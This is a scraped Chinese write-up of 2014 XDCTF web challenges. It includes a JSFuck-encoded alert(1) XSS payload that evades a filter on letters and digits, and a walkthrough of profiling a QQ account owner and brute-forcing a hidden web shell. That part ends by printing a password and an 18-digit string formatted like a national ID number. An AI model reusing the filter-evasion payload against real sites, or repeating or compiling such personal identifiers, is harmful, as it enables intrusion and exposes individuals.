XDCTF WEB-some
来源:互联网 发布:北京凶宅数据库名单 编辑:程序博客网 时间:2024/05/21 16:55
Web-20
唉看到这道题目我真是醉了。
PHP彩蛋
http://game1.xdctf.com:8081/H86Ki4NnCSVv/?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000
WEB-50:
看一眼,是一个crx,直接改后缀到zip。
有个json
Base64解码后,表示在坑我。
嗯,果然是西电的风格。
在jpg的备注里找到了这个,然后转换一下,flag。
WEB-70
看见是一个xss,看了眼源码,没什么营养,到key.php,测试下过滤了哪些:
别的就不说了,这玩意连个字母数字都不能有,尼玛啊~!
木有数字英文xxxx的,小生我想到的只有jsfuck了。
找个alert(1)的,果然成功
[][(![]+[])[+[[+[]]]]+([][[]]+[])[+[[!+[]+!+[]+!+[]+!+[]+!+[]]]]+(![]+[])[+[[!+[]+!+[]]]]+(!![]+[])[+[[+[]]]]+(!![]+[])[+[[!+[]+!+[]+!+[]]]]+(!![]+[])[+[[+!+[]]]]][([][(![]+[])[+[[+[]]]]+([][[]]+[])[+[[!+[]+!+[]+!+[]+!+[]+!+[]]]]+(![]+[])[+[[!+[]+!+[]]]]+(!![]+[])[+[[+[]]]]+(!![]+[])[+[[!+[]+!+[]+!+[]]]]+(!![]+[])[+[[+!+[]]]]]+[])[+[[!+[]+!+[]+!+[]]]]+([][(![]+[])[+[[+[]]]]+([][[]]+[])[+[[!+[]+!+[]+!+[]+!+[]+!+[]]]]+(![]+[])[+[[!+[]+!+[]]]]+(!![]+[])[+[[+[]]]]+(!![]+[])[+[[!+[]+!+[]+!+[]]]]+(!![]+[])[+[[+!+[]]]]]+[])[+[[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]]]+([][[]]+[])[+[[+!+[]]]]+(![]+[])[+[[!+[]+!+[]+!+[]]]]+(!![]+[])[+[[+[]]]]+(!![]+[])[+[[+!+[]]]]+([][[]]+[])[+[[+[]]]]+([][(![]+[])[+[[+[]]]]+([][[]]+[])[+[[!+[]+!+[]+!+[]+!+[]+!+[]]]]+(![]+[])[+[[!+[]+!+[]]]]+(!![]+[])[+[[+[]]]]+(!![]+[])[+[[!+[]+!+[]+!+[]]]]+(!![]+[])[+[[+!+[]]]]]+[])[+[[!+[]+!+[]+!+[]]]]+(!![]+[])[+[[+[]]]]+([][(![]+[])[+[[+[]]]]+([][[]]+[])[+[[!+[]+!+[]+!+[]+!+[]+!+[]]]]+(![]+[])[+[[!+[]+!+[]]]]+(!![]+[])[+[[+[]]]]+(!![]+[])[+[[!+[]+!+[]+!+[]]]]+(!![]+[])[+[[+!+[]]]]]+[])[+[[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]]]+(!![]+[])[+[[+!+[]]]]]((![]+[])[+[[+!+[]]]]+(![]+[])[+[[!+[]+!+[]]]]+(!![]+[])[+[[!+[]+!+[]+!+[]]]]+(!![]+[])[+[[+!+[]]]]+(!![]+[])[+[[+[]]]]+([][(![]+[])[+[[+[]]]]+([][[]]+[])[+[[!+[]+!+[]+!+[]+!+[]+!+[]]]]+(![]+[])[+[[!+[]+!+[]]]]+(!![]+[])[+[[+[]]]]+(!![]+[])[+[[!+[]+!+[]+!+[]]]]+(!![]+[])[+[[+!+[]]]]]+[])[+[[+!+[]]]+[[!+[]+!+[]+!+[]+!+[]+!+[]]]]+[+!+[]]+([][(![]+[])[+[[+[]]]]+([][[]]+[])[+[[!+[]+!+[]+!+[]+!+[]+!+[]]]]+(![]+[])[+[[!+[]+!+[]]]]+(!![]+[])[+[[+[]]]]+(!![]+[])[+[[!+[]+!+[]+!+[]]]]+(!![]+[])[+[[+!+[]]]]]+[])[+[[+!+[]]]+[[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]]])()
WEB-180:
源码下下来,找到一个隐藏的shell:
发现一个qq,找一下:
可以通过这个构造,用户名是昵称,29岁在1985年,长安区这里比较坑,后来还是爆破出来的,1985年那会木有长安区,是长按县。然后5月7日。备注里有个数字看起来像是身份证后四位,shell里面密码也像是身份证后四位=0=不过我们爆破了。最后:
gh0st2014
610121198505073895
- XDCTF WEB-some
- 2014XDCTF——web简单write up
- XDCTF WEB250
- XDCTF CRACK180
- XDCTF coding200
- xdctf-pwn200
- Some Java Web Exception
- Some urls - Web relating
- About Xdctf【1】
- XDCTF 部分Writeup
- 2017 XDCTF Upload
- Some useful tools for the Web Developer
- Some web site about Network security
- Server & Client some code from the web
- APEX: Some good web sites about APEX
- Some Solutions for Pure-javascript Web Application
- Some of the most common web site
- Some useful tools in web development
- ASP.NET MVC 入门5: Control 与 View的交互
- 开始设了Robots.txt禁止百度抓取
- 编程之美:小飞的电梯调度(k次停留)
- Gcc 编译与安装
- Linux 静态IP地址设置
- XDCTF WEB-some
- F. Ant colony(Codeforces Round #271)
- Python-OpenCV教程-4
- SVN中文版客户端下载安装及配置
- linux的hostname修改详解
- Linux设置虚拟内存
- fastcgi++应用初探
- 输入一个错位后敲出的字符串,输出打字员本想打出的字符
- 学习中遇到的难题